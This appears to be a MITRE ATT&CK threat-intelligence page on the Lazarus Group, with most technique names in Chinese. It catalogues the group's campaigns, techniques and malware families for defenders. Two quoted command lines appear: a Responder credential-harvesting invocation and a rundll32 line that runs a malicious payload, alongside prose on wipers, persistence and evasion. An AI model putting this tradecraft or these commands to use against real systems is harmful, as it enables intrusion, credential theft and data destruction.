1. Home
  2. Groups
  3. Lazarus Group

Lazarus Group

Lazarus Group is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.[1][2] The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by Lazarus Group correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.[3]

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups, such as Andariel, APT37, APT38, and Kimsuky.

ID: G0032
Associated Groups: Labyrinth Chollima, HIDDEN COBRA, Guardians of Peace, ZINC, NICKEL ACADEMY, Diamond Sleet
Contributors: Kyaw Pyiyt Htet, @KyawPyiytHtet; Dragos Threat Intelligence; MyungUk Han, ASEC; Jun Hirata, NEC Corporation; Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India
Version: 4.1
Created: 31 May 2017
Last Modified: 16 April 2025

Associated Group Descriptions

Name Description
Labyrinth Chollima

[4]
HIDDEN COBRA

The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.[1][5]
Guardians of Peace

[1]
ZINC

[6]
NICKEL ACADEMY

[7]
Diamond Sleet

[8]

Campaigns

ID Name First Seen Last Seen References Techniques
C0022 Operation Dream Job September 2019 [9] August 2020 [10]

[10][11][12][9]

 Windows管理规范, XSL脚本处理, 从本地系统获取数据, 伪装: Masquerade File Type, 伪装, 内部鱼叉式钓鱼, 加密通道: Symmetric Cryptography, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Visual Basic, 命令与脚本解释器: PowerShell, 命令与脚本解释器: Windows Command Shell, 基础设施妥协: Domains, 基础设施妥协: Server, 应用层协议: Web Protocols, 建立账户: Social Media Accounts, 建立账户: Email Accounts, 开发能力: Code Signing Certificates, 开发能力: Malware, 归档收集数据: Archive via Utility, 搜索开放网站/域: Social Media, 收集受害者组织信息, 收集受害者组织信息: Identify Roles, 收集受害者身份信息, 文件和目录发现, 暂存能力: Upload Malware, 暂存能力: Upload Tool, 暴力破解, 服务器软件组件: IIS Components, 本机API, 模板注入, 混淆文件或信息: Software Packing, 混淆文件或信息: Encrypted/Encoded File, 用户执行: Malicious Link, 用户执行: Malicious File, 移除指标: File Deletion, 系统二进制代理执行: Rundll32, 系统二进制代理执行: Regsvr32, 系统位置发现: System Language Discovery, 获取基础设施: Server, 获取基础设施: Domains, 获取基础设施: Web Services, 获取能力: Code Signing Certificates, 获取能力: Tool, 虚拟化/沙盒规避: System Checks, 虚拟化/沙盒规避: Time Based Evasion, 调试器规避, 账号发现: Domain Account, 输入工具传输, 通过C2信道渗出, 通过网络服务渗出: Exfiltration to Cloud Storage, 钓鱼: Spearphishing via Service, 钓鱼: Spearphishing Attachment, 钓鱼: Spearphishing Link, 预定任务/作业: Scheduled Task, 颠覆信任控制: Code Signing
Enterprise Layer
download view
ICS Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows管理规范

Lazarus Group has used WMIC for discovery as well as to execute payloads for persistence and lateral movement.[3][13][14][15]

During Operation Dream Job, Lazarus Group used WMIC to executed a remote XSL script.[9]
Enterprise T1220 XSL脚本处理

During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader.[9]
Enterprise T1557 .001 中间人攻击: LLMNR/NBT-NS Poisoning and SMB Relay

Lazarus Group executed Responder using the command [Responder file path] -i [IP address] -rPv on a compromised host to harvest credentials and move laterally.[14]
Enterprise T1005 从本地系统获取数据

Lazarus Group has collected data and files from compromised networks.[3][16][13][14]

During Operation Dream Job, Lazarus Group used malicious Trojans and DLL files to exfiltrate data from an infected host.[10][11]
Enterprise T1090 .001 代理: Internal Proxy

Lazarus Group has used a compromised router to serve as a proxy between a victim network's corporate and restricted segments.[14]
.002 代理: External Proxy

Lazarus Group has used multiple proxies to obfuscate network traffic from victims.[17][18]
Enterprise T1036 .003 伪装: Rename System Utilities

Lazarus Group has renamed system utilities such as wscript.exe and mshta.exe.[15]
.004 伪装: Masquerade Task or Service

Lazarus Group has used a scheduled task named SRCheck to mask the execution of a malicious .dll.[19]
.005 伪装: Match Legitimate Name or Location

Lazarus Group has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.[20][15]
.008 伪装: Masquerade File Type

During Operation Dream Job, Lazarus Group disguised malicious template files as JPEG files to avoid detection.[11][9]
Enterprise T1656 伪装

During Operation Dream Job, Lazarus Group impersonated HR hiring personnel through LinkedIn messages and conducted interviews with victims in order to deceive them into downloading malware.[10][9][21]
Enterprise T1534 内部鱼叉式钓鱼

During Operation Dream Job, Lazarus Group conducted internal spearphishing from within a compromised organization.[10]
Enterprise T1543 .003 创建或修改系统进程: Windows Service

Several Lazarus Group malware families install themselves as new services.[3][22]
Enterprise T1573 .001 加密通道: Symmetric Cryptography

Several Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another Lazarus Group malware sample XORs C2 traffic. Other Lazarus Group malware uses Caracachs encryption to encrypt C2 payloads. Lazarus Group has also used AES to encrypt C2 traffic.[3][22][23][24]

During Operation Dream Job, Lazarus Group used an AES key to communicate with their C2 server.[11]
Enterprise T1574 .002 劫持执行流: DLL Side-Loading

Lazarus Group has replaced win_fw.dll, an internal component that is executed during IDA Pro installation, with a malicious DLL to download and execute a payload.[19]
.013 劫持执行流: KernelCallbackTable

Lazarus Group has abused the KernelCallbackTable to hijack process control flow and execute shellcode.[25][15]
Enterprise T1620 反射性代码加载

Lazarus Group has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking. Lazarus Group has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime.[25][15]
Enterprise T1140 反混淆/解码文件或信息

Lazarus Group has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime.[25][15]
Enterprise T1547 .001 启动或登录自动启动执行: Registry Run Keys / Startup Folder

Lazarus Group has maintained persistence by loading malicious code into a startup folder or by adding a Registry Run key.[3][13][23][25]

During Operation Dream Job, Lazarus Group placed LNK files into the victims' startup folder for persistence.[11]

.009 启动或登录自动启动执行: Shortcut Modification

Lazarus Group malware has maintained persistence on a system by creating a LNK shortcut in the user’s Startup folder.[23]
Enterprise T1059 .001 命令与脚本解释器: PowerShell

Lazarus Group has used PowerShell to execute commands and malicious code.[26]

During Operation Dream Job, Lazarus Group used PowerShell commands to explore the environment of compromised victims.[9]
.003 命令与脚本解释器: Windows Command Shell

Lazarus Group malware uses cmd.exe to execute commands on a compromised host.[3][22][23][27][15] A Destover-like variant used by Lazarus Group uses a batch file mechanism to delete its binaries from the system.[24]

During Operation Dream Job, Lazarus Group launched malicious DLL files, created new folders, and renamed folders with the use of the Windows command shell.[9][11]
.005 命令与脚本解释器: Visual Basic

Lazarus Group has used VBA and embedded macros in Word documents to execute malicious code.[25][15]

During Operation Dream Job, Lazarus Group executed a VBA written malicious macro after victims download malicious DOTM files; Lazarus Group also used Visual Basic macro code to extract a double Base64 encoded DLL implant.[10][11]
Enterprise T1008 回退信道

Lazarus Group malware SierraAlfa sends data to one of the hard-coded C2 servers chosen at random, and if the transmission fails, chooses a new C2 server to attempt the transmission again.[3][13]
Enterprise T1584 .001 基础设施妥协: Domains

For Operation Dream Job, Lazarus Group compromised domains in Italy and other countries for their C2 infrastructure.[11][12]
.004 基础设施妥协: Server

Lazarus Group has compromised servers to stage malicious tools.[14]

For Operation Dream Job, Lazarus Group compromised servers to host their malicious tools.[10][9][11]
Enterprise T1104 多阶段信道

Lazarus Group has used multi-stage malware components that inject later stages into separate processes.[25]
Enterprise T1562 .001 妨碍防御: Disable or Modify Tools

Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.[3][16][28][27].

.004 妨碍防御: Disable or Modify System Firewall

Various Lazarus Group malware modifies the Windows firewall to allow incoming connections or disable it entirely using netsh. [3][16][28]
Enterprise T1203 客户端执行漏洞利用

Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.[29]
Enterprise T1071 .001 应用层协议: Web Protocols

Lazarus Group has conducted C2 over HTTP and HTTPS.[23][30][18][25][15][19]

During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.[11]

Enterprise T1010 应用窗口发现

Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground.[3][16][28]
Enterprise T1585 .001 建立账户: Social Media Accounts

Lazarus Group has created new Twitter accounts to conduct social engineering against potential victims.[26]

For Operation Dream Job, Lazarus Group created fake LinkedIn accounts for their targeting efforts.[10][9]
.002 建立账户: Email Accounts

Lazarus Group has created new email accounts for spearphishing operations.[14]

During Operation Dream Job, Lazarus Group created fake email accounts to correspond with fake LinkedIn personas; Lazarus Group also established email accounts to match those of the victim as part of their BEC attempt.[9]
Enterprise T1587 .001 开发能力: Malware

Lazarus Group has developed custom malware for use in their operations.[31][26]

For Operation Dream Job, Lazarus Group developed custom tools such as Sumarta, DBLL Dropper, Torisma, and DRATzarus for their operations.[10][9][11][12]
.002 开发能力: Code Signing Certificates

During Operation Dream Job, Lazarus Group digitally signed their malware and the dbxcli utility.[9]
Enterprise T1560 归档收集数据

Lazarus Group has compressed exfiltrated data with RAR and used RomeoDelta malware to archive specified directories in .zip format, encrypt the .zip file, and upload it to C2. [16][13][23]
.001 Archive via Utility

During Operation Dream Job, Lazarus Group archived victim's data into a RAR file.[9]
.002 Archive via Library

Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.[13][23]
.003 Archive via Custom Method

A Lazarus Group malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.[3][16][13][23]
Enterprise T1593 .001 搜索开放网站/域: Social Media

For Operation Dream Job, Lazarus Group used LinkedIn to identify and target employees within a chosen organization.[9]
Enterprise T1591 收集受害者组织信息

Lazarus Group has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals.[14]

For Operation Dream Job, Lazarus Group gathered victim organization information to identify specific targets.[10]
.004 Identify Roles

During Operation Dream Job, Lazarus Group targeted specific individuals within an organization with tailored job vacancy announcements.[10][9]
Enterprise T1589 .002 收集受害者身份信息: Email Addresses

Lazarus Group collected email addresses belonging to various departments of a targeted organization which were used in follow-on phishing campaigns.[14]
Enterprise T1074 .001 数据分段: Local Data Staging

Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.[3][16]
Enterprise T1001 .003 数据混淆: Protocol or Service Impersonation

Lazarus Group malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection/decryption.[3][22][23][32]
Enterprise T1132 .001 数据编码: Standard Encoding

A Lazarus Group malware sample encodes data with base64.[23]
Enterprise T1485 数据销毁

Lazarus Group has used a custom secure delete function to overwrite file contents with data from heap memory.[3]
Enterprise T1083 文件和目录发现

Lazarus Group malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.[3][24][25][15]

During Operation Dream Job, Lazarus Group conducted word searches within documents on a compromised host in search of security and financial matters.[10]
Enterprise T1608 .001 暂存能力: Upload Malware

For Operation Dream Job, Lazarus Group used compromised servers to host malware.[10][9][11][12]
.002 暂存能力: Upload Tool

For Operation Dream Job, Lazarus Group used multiple servers to host malicious tools.[9]
Enterprise T1110 .003 暴力破解: Password Spraying

Lazarus Group malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.[3][13]
Enterprise T1048 .003 替代协议渗出: Exfiltration Over Unencrypted Non-C2 Protocol

Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.[3][13]
Enterprise T1078 有效账户

Lazarus Group has used administrator credentials to gain access to restricted network segments.[14]
Enterprise T1489 服务停止

Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.[22]
Enterprise T1505 .004 服务器软件组件: IIS Components

During Operation Dream Job, Lazarus Group targeted Windows servers running Internet Information Systems (IIS) to install C2 components.[11]
Enterprise T1106 本机API

Lazarus Group has used the Windows API ObtainUserAgentString to obtain the User-Agent from a compromised host to connect to a C2 server.[11] Lazarus Group has also used various, often lesser known, functions to perform various types of Discovery and Process Injection.[25][15]

During Operation Dream Job, Lazarus Group used Windows API ObtainUserAgentString to obtain the victim's User-Agent and used the value to connect to their C2 server.[11]
Enterprise T1012 查询注册表

Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another Lazarus Group malware sample checks for the presence of the following Registry key:HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt.[3][16][23]
Enterprise T1221 模板注入

During Operation Dream Job, Lazarus Group used DOCX files to retrieve a malicious document template/DOTM file.[10][11]
Enterprise T1189 浏览器攻击

Lazarus Group delivered RATANKBA and other malicious code to victims via a compromised legitimate website.[33][26]
Enterprise T1027 .002 混淆文件或信息: Software Packing

During Operation Dream Job, Lazarus Group packed malicious .db files with Themida to evade detection.[10][11][12]
.007 混淆文件或信息: Dynamic API Resolution

Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.[25]
.013 混淆文件或信息: Encrypted/Encoded File

Lazarus Group has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for Native API function names.[3][16][13][23][18][25][15]

During Operation Dream Job, Lazarus Group encrypted malware such as DRATzarus with XOR and DLL files with base64.[10][9][11][12]
Enterprise T1204 .001 用户执行: Malicious Link

During Operation Dream Job, Lazarus Group lured users into executing a malicious link to disclose private account information or provide initial access.[10][9]
.002 用户执行: Malicious File

Lazarus Group has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.[29][14][25][15]

During Operation Dream Job, Lazarus Group lured victims into executing malicious documents that contained "dream job" descriptions from defense, aerospace, and other sectors.[10][11]
Enterprise T1561 .001 磁盘擦除: Disk Content Wipe

Lazarus Group has used malware like WhiskeyAlfa to overwrite the first 64MB of every drive with a mix of static and random buffers. A similar process is then used to wipe content in logical drives and, finally, attempt to wipe every byte of every sector on every drive. WhiskeyBravo can be used to overwrite the first 4.9MB of physical drives. WhiskeyDelta can overwrite the first 132MB or 1.5MB of each drive with random data from heap memory.[22]
.002 磁盘擦除: Disk Structure Wipe

Lazarus Group malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine and has possessed MBR wiper malware since at least 2009.[27][3]
Enterprise T1070 移除指标

Lazarus Group has restored malicious KernelCallbackTable code to its original state after the process execution flow has been hijacked.[25]
.003 Clear Command History

Lazarus Group has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.[14]

.004 File Deletion

Lazarus Group malware has deleted files in various ways, including "suicide scripts" to delete malware binaries from the victim. Lazarus Group also uses secure file deletion to delete files from the victim.[3][24]

During Operation Dream Job, Lazarus Group removed all previously delivered files from a compromised computer.[9]
.006 Timestomp

Several Lazarus Group malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.[3][22][16][24]
Enterprise T1491 .001 篡改: Internal Defacement

Lazarus Group replaced the background wallpaper of systems with a threatening image after rendering the system unbootable with a Disk Structure Wipe.[22]
Enterprise T1218 系统二进制代理执行

Lazarus Group lnk files used for persistence have abused the Windows Update Client (wuauclt.exe) to execute a malicious DLL.[25][15]
.005 Mshta

Lazarus Group has used mshta.exe to execute HTML pages downloaded by initial access documents.[25][15]
.010 Regsvr32

During Operation Dream Job, Lazarus Group used regsvr32 to execute malware.[9]
.011 Rundll32

Lazarus Group has used rundll32 to execute malicious payloads on a compromised host.[19]

During Operation Dream Job, Lazarus Group executed malware with C:\\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db", CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905.[10][9][11]
Enterprise T1614 .001 系统位置发现: System Language Discovery

During Operation Dream Job, Lazarus Group deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.[10]
Enterprise T1082 系统信息发现

Several Lazarus Group malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by Lazarus Group also collects disk space information and sends it to its C2 server.[3][22][16][23][24][25]
Enterprise T1529 系统关机/重启

Lazarus Group has rebooted systems after destroying files and wiping the MBR on infected systems.[27]
Enterprise T1033 系统所有者/用户发现

Various Lazarus Group malware enumerates logged-on users.[3][22][16][13][23][30][25]
Enterprise T1124 系统时间发现

A Destover-like implant used by Lazarus Group can obtain the current system time and send it to the C2 server.[24]
Enterprise T1049 系统网络连接发现

Lazarus Group has used net use to identify and establish a network connection with a remote host.[14]
Enterprise T1016 系统网络配置发现

Lazarus Group malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.[3][16]
Enterprise T1102 .002 网络服务: Bidirectional Communication

Lazarus Group has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories.[25]
Enterprise T1046 网络服务发现

Lazarus Group has used nmap from a router VM to scan ports on systems within the restricted segment of an enterprise network.[14]
Enterprise T1583 .001 获取基础设施: Domains

Lazarus Group has acquired domains related to their campaigns to act as distribution points and C2 channels.[31][26]

During Operation Dream Job, Lazarus Group registered a domain name identical to that of a compromised company as part of their BEC effort.[9]
.004 获取基础设施: Server

During Operation Dream Job, Lazarus Group acquired servers to host their malicious tools.[9]
.006 获取基础设施: Web Services

Lazarus Group has hosted malicious downloads on Github.[31]

During Operation Dream Job, Lazarus Group used file hosting services like DropBox and OneDrive.[10]
Enterprise T1588 .002 获取能力: Tool

Lazarus Group has obtained a variety of tools for their operations, including Responder and PuTTy PSCP.[14]

For Operation Dream Job, Lazarus Group obtained tools such as Wake-On-Lan, Responder, ChromePass, and dbxcli.[10][9]
.003 获取能力: Code Signing Certificates

During Operation Dream Job, Lazarus Group used code signing certificates issued by Sectigo RSA for some of its malware and tools.[9]

.004 获取能力: Digital Certificates

Lazarus Group has obtained SSL certificates for their C2 domains.[31]
Enterprise T1497 .001 虚拟化/沙盒规避: System Checks

During Operation Dream Job, Lazarus Group used tools that conducted a variety of system checks to detect sandboxes or VMware services.[10]
.003 虚拟化/沙盒规避: Time Based Evasion

During Operation Dream Job, Lazarus Group used tools that collected GetTickCount and GetSystemTimeAsFileTime data to detect sandbox or VMware services.[10]
Enterprise T1134 .002 访问令牌操控: Create Process with Token

Lazarus Group keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call CreateProcessAsUserA under that user's context.[3][28]
Enterprise T1622 调试器规避

During Operation Dream Job, Lazarus Group used tools that used the IsDebuggerPresent call to detect debuggers.[10]
Enterprise T1087 .002 账号发现: Domain Account

During Operation Dream Job, Lazarus Group queried compromised victim's active directory servers to obtain the list of employees including administrator accounts.[9]
Enterprise T1098 账号操控

Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account.[3][22]
Enterprise T1105 输入工具传输

Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host.[3][22][16][30][18][14][26][25][15][19]

During Operation Dream Job, Lazarus Group downloaded multistage malware and tools onto a compromised host.[10][9][11]
Enterprise T1056 .001 输入捕获: Keylogging

Lazarus Group malware KiloAlfa contains keylogging functionality.[3][28]
Enterprise T1057 进程发现

Several Lazarus Group malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by Lazarus Group also gathers process times.[3][16][23][24][18][25]
Enterprise T1055 .001 进程注入: Dynamic-link Library Injection

A Lazarus Group malware sample performs reflective DLL injection.[23][25]
Enterprise T1021 .001 远程服务: Remote Desktop Protocol

Lazarus Group malware SierraCharlie uses RDP for propagation.[3][13]
.002 远程服务: SMB/Windows Admin Shares

Lazarus Group malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.[3][13]
.004 远程服务: SSH

Lazarus Group used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network.[14]
Enterprise T1041 通过C2信道渗出

Lazarus Group has exfiltrated data and files over a C2 channel through its various tools and malware.[3][16][23]

During Operation Dream Job, Lazarus Group exfiltrated data from a compromised host to actor-controlled C2 servers.[10]
Enterprise T1567 .002 通过网络服务渗出: Exfiltration to Cloud Storage

During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.[9][10]
Enterprise T1566 .001 钓鱼: Spearphishing Attachment

Lazarus Group has targeted victims with spearphishing emails containing malicious Microsoft Word documents.[29][14][25][15]

During Operation Dream Job, Lazarus Group sent emails with malicious attachments to gain unauthorized access to targets' computers.[10][11]
.002 钓鱼: Spearphishing Link

Lazarus Group has sent malicious links to victims via email.[14]

During Operation Dream Job, Lazarus Group sent malicious OneDrive links with fictitious job offer advertisements via email.[10][9]
.003 钓鱼: Spearphishing via Service

Lazarus Group has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.[26]

During Operation Dream Job, Lazarus Group sent victims spearphishing messages via LinkedIn concerning fictitious jobs.[10][9]
Enterprise T1202 间接命令执行

Lazarus Group persistence mechanisms have used forfiles.exe to execute .htm files.[15]
Enterprise T1564 .001 隐藏伪装: Hidden Files and Directories

Lazarus Group has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application.[23][30][18][25]
Enterprise T1571 非标准端口

Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.[3][13]
Enterprise T1053 .005 预定任务/作业: Scheduled Task

Lazarus Group has used schtasks for persistence including through the periodic execution of a remote XSL script or a dropped VBS payload.[15][19]

During Operation Dream Job, Lazarus Group created scheduled tasks to set a periodic execution of a remote XSL script.[9]
Enterprise T1542 .003 预操作系统引导: Bootkit

Lazarus Group malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure that the malware will persist even if a victim machine shuts down.[3][22]
Enterprise T1553 .002 颠覆信任控制: Code Signing

Lazarus Group has digitally signed malware and utilities to evade detection.[25]

During Operation Dream Job, Lazarus Group digitally signed their own malware to evade detection.[9]
ICS T0865 Spearphishing Attachment

Lazarus Group has been observed targeting organizations using spearphishing documents with embedded malicious payloads. [34] Highly targeted spear phishing campaigns have been conducted against a U.S. electric grid company. [35]

Software

ID Name References Techniques
S0584 AppleJeus [31] 事件触发执行: Installer Packages, 创建或修改系统进程: Windows Service, 创建或修改系统进程: Launch Daemon, 反混淆/解码文件或信息, 命令与脚本解释器: Unix Shell, 应用层协议: Web Protocols, 混淆文件或信息, 滥用权限提升控制机制: Bypass User Account Control, 用户执行: Malicious File, 用户执行: Malicious Link, 移除指标: File Deletion, 系统二进制代理执行: Msiexec, 系统信息发现, 系统服务: Launchctl, 虚拟化/沙盒规避: Time Based Evasion, 通过C2信道渗出, 钓鱼: Spearphishing Link, 隐藏伪装: Hidden Files and Directories, 预定任务/作业: Scheduled Task, 颠覆信任控制: Code Signing
S0347 AuditCred [36] 代理, 创建或修改系统进程: Windows Service, 反混淆/解码文件或信息, 命令与脚本解释器: Windows Command Shell, 文件和目录发现, 混淆文件或信息: Encrypted/Encoded File, 移除指标: File Deletion, 输入工具传输, 进程注入
S0245 BADCALL [37] 代理, 修改注册表, 加密通道: Symmetric Cryptography, 妨碍防御: Disable or Modify System Firewall, 数据混淆: Protocol or Service Impersonation, 系统信息发现, 系统网络配置发现, 非标准端口
S0239 Bankshot [29] 从本地系统获取数据, 修改注册表, 创建或修改系统进程: Windows Service, 反混淆/解码文件或信息, 命令与脚本解释器: Windows Command Shell, 客户端执行漏洞利用, 应用层协议: Web Protocols, 数据混淆: Protocol or Service Impersonation, 数据编码: Non-Standard Encoding, 文件和目录发现, 本机API, 查询注册表, 移除指标: File Deletion, 移除指标: Timestomp, 移除指标, 系统信息发现, 自动化收集, 访问令牌操控: Create Process with Token, 账号发现: Local Account, 账号发现: Domain Account, 输入工具传输, 进程发现, 通过C2信道渗出, 非标准端口
S0520 BLINDINGCAN [38] 从本地系统获取数据, 伪装: Match Legitimate Name or Location, 共享模块, 加密通道: Symmetric Cryptography, 反混淆/解码文件或信息, 命令与脚本解释器: Windows Command Shell, 应用层协议: Web Protocols, 数据编码: Standard Encoding, 文件和目录发现, 混淆文件或信息: Encrypted/Encoded File, 混淆文件或信息: Software Packing, 用户执行: Malicious File, 移除指标: File Deletion, 移除指标: Timestomp, 系统二进制代理执行: Rundll32, 系统信息发现, 系统网络配置发现, 输入工具传输, 通过C2信道渗出, 钓鱼: Spearphishing Attachment, 颠覆信任控制: Code Signing
S0498 Cryptoistic [30] 从本地系统获取数据, 加密通道, 文件和目录发现, 移除指标: File Deletion, 系统所有者/用户发现, 输入工具传输, 非应用层协议
S0497 Dacls [30][18] 伪装, 创建或修改系统进程: Launch Agent, 创建或修改系统进程: Launch Daemon, 应用层协议: Web Protocols, 文件和目录发现, 混淆文件或信息: Encrypted/Encoded File, 输入工具传输, 进程发现, 隐藏伪装: Hidden Files and Directories
S0694 DRATzarus During Operation Dream Job, Lazarus Group used DRATzarus to deploy open source software and partly commodity software such as Responder, Wake-On-Lan, and ChromePass to target infected hosts.[10] 从本地系统获取数据, 伪装: Match Legitimate Name or Location, 应用层协议: Web Protocols, 本机API, 混淆文件或信息: Software Packing, 混淆文件或信息, 系统所有者/用户发现, 系统时间发现, 虚拟化/沙盒规避: Time Based Evasion, 调试器规避, 输入工具传输, 进程发现, 远程系统发现
S0567 Dtrack [39] 从本地系统获取数据, 伪装: Match Legitimate Name or Location, 共享模块, 创建或修改系统进程: Windows Service, 劫持执行流, 反混淆/解码文件或信息, 启动或登录自动启动执行, 命令与脚本解释器: Windows Command Shell, 归档收集数据, 数据分段: Local Data Staging, 文件和目录发现, 有效账户, 查询注册表, 浏览器信息发现, 混淆文件或信息: Embedded Payloads, 移除指标: File Deletion, 系统信息发现, 系统网络连接发现, 系统网络配置发现, 输入工具传输, 输入捕获: Keylogging, 进程发现, 进程注入: Process Hollowing
S0593 ECCENTRICBANDWAGON [40] 命令与脚本解释器: Windows Command Shell, 屏幕捕获, 数据分段: Local Data Staging, 混淆文件或信息, 移除指标: File Deletion, 输入捕获: Keylogging
S0181 FALLCHILL [17] 创建或修改系统进程: Windows Service, 加密通道: Symmetric Cryptography, 数据混淆: Protocol or Service Impersonation, 文件和目录发现, 移除指标: Timestomp, 移除指标: File Deletion, 系统信息发现, 系统网络配置发现
S0246 HARDRAIN [41] 代理, 命令与脚本解释器: Windows Command Shell, 妨碍防御: Disable or Modify System Firewall, 数据混淆: Protocol or Service Impersonation, 非标准端口
S0376 HOPLIGHT [5] Windows管理规范, 事件触发执行: Windows Management Instrumentation Event Subscription, 代理, 使用备用认证材料: Pass the Hash, 修改注册表, 命令与脚本解释器: Windows Command Shell, 回退信道, 妨碍防御: Disable or Modify System Firewall, 操作系统凭证转储: Security Account Manager, 数据编码: Standard Encoding, 文件和目录发现, 查询注册表, 系统信息发现, 系统时间发现, 系统服务: Service Execution, 设备驱动程序探测, 输入工具传输, 进程注入, 通过C2信道渗出, 非标准端口
S0431 HotCroissant [42] 加密通道: Symmetric Cryptography, 命令与脚本解释器: Windows Command Shell, 屏幕捕获, 应用窗口发现, 文件和目录发现, 服务停止, 本机API, 混淆文件或信息: Software Packing, 混淆文件或信息: Encrypted/Encoded File, 移除指标: File Deletion, 系统信息发现, 系统所有者/用户发现, 系统服务发现, 系统网络配置发现, 软件发现, 输入工具传输, 进程发现, 通过C2信道渗出, 隐藏伪装: Hidden Window, 预定任务/作业: Scheduled Task
S0271 KEYMARBLE [43] 修改注册表, 加密通道: Symmetric Cryptography, 命令与脚本解释器: Windows Command Shell, 屏幕捕获, 文件和目录发现, 移除指标: File Deletion, 系统信息发现, 系统网络配置发现, 输入工具传输, 进程发现
S0108 netsh [16] 事件触发执行: Netsh Helper DLL, 代理, 妨碍防御: Disable or Modify System Firewall, 软件发现: Security Software Discovery
S0238 Proxysvc [24] 从本地系统获取数据, 命令与脚本解释器: Windows Command Shell, 应用层协议: Web Protocols, 数据销毁, 文件和目录发现, 查询注册表, 移除指标: File Deletion, 系统信息发现, 系统时间发现, 系统服务: Service Execution, 系统网络配置发现, 自动化收集, 进程发现, 通过C2信道渗出
S0241 RATANKBA [44] Windows管理规范, 命令与脚本解释器: Windows Command Shell, 命令与脚本解释器: PowerShell, 应用层协议: Web Protocols, 查询注册表, 系统信息发现, 系统所有者/用户发现, 系统服务发现, 系统网络连接发现, 系统网络配置发现, 账号发现: Local Account, 输入工具传输, 进程发现, 进程注入: Dynamic-link Library Injection, 远程系统发现
S0364 RawDisk [3][22] 数据销毁, 磁盘擦除: Disk Structure Wipe, 磁盘擦除: Disk Content Wipe
S0174 Responder [10] 中间人攻击: LLMNR/NBT-NS Poisoning and SMB Relay, 网络嗅探
S0103 route [14] 系统网络配置发现
S0586 TAINTEDSCRIBE [20] 伪装: Match Legitimate Name or Location, 加密通道: Symmetric Cryptography, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Windows Command Shell, 回退信道, 归档收集数据, 数据混淆: Protocol or Service Impersonation, 文件和目录发现, 混淆文件或信息: Binary Padding, 移除指标: Timestomp, 移除指标: File Deletion, 系统信息发现, 系统时间发现, 输入工具传输, 进程发现, 远程系统发现
